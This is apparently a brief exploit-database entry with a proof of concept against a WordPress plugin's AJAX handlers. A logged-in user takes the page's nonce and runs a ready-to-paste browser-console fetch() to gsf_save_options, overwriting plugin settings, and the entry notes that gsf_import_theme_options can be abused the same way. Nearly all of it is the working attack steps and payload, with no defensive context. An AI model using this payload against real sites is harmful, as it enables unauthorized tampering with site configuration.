Share
## https://sploitus.com/exploit?id=WPEX-ID:96396A22-F523-4C51-8B72-52BE266988AA
1. login, and visit https://vulnerable-site.tld/wp-admin/profile.php?action=delete
2. run the following in your browser console: 

fetch("/wp-admin/admin-ajax.php?action=gsf_save_options", {"headers": {"content-type": "application/x-www-form-urlencoded",},"body": `_wpnonce=${GSF_META_DATA['nonce']}&_current_preset=template`,"method": "POST",}).then((response) => {return response.text();    }).then((data) => {console.log(data);})

The same can be achieved via other AJAX actions in the plugin, like "gsf_import_theme_options".